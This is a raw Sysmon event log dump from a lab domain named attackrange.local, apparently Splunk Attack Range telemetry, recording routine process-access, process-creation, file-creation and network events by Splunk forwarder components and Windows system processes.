07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.312{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.843{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E1F6FDCBC4E8DE65B6A793ABDE13D5D,SHA256=565FAE91DD53E0FA47C645C7531835CCE8EAD51238A18EA99648A25828557251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:25.041{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AEBA23415745FBD56FD503C76945CEC,SHA256=17F44A8698D034BBCA221167741890F203B84F03DA30274B91AE818E70AA44A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.780{0C1E0330-F65D-60EB-A679-00000000D001}29121532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.640{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.625{0C1E0330-F65D-60EB-A679-00000000D001}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.546{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF2C193B54D23136B2175C63B854107B,SHA256=1789E6722C019973E89EF0C8DF785AE4458F4A804975ACD284908DE837F55C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.546{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1EE1415AC55FB2158BAAD41B74D1297,SHA256=7410051FF406EDE76B1F1BCB6A47733F512DC02DEE2598A646A8C72082026B39,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:23.334{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57357-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000808839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65D-60EB-A579-00000000D001}3028C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:25.015{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 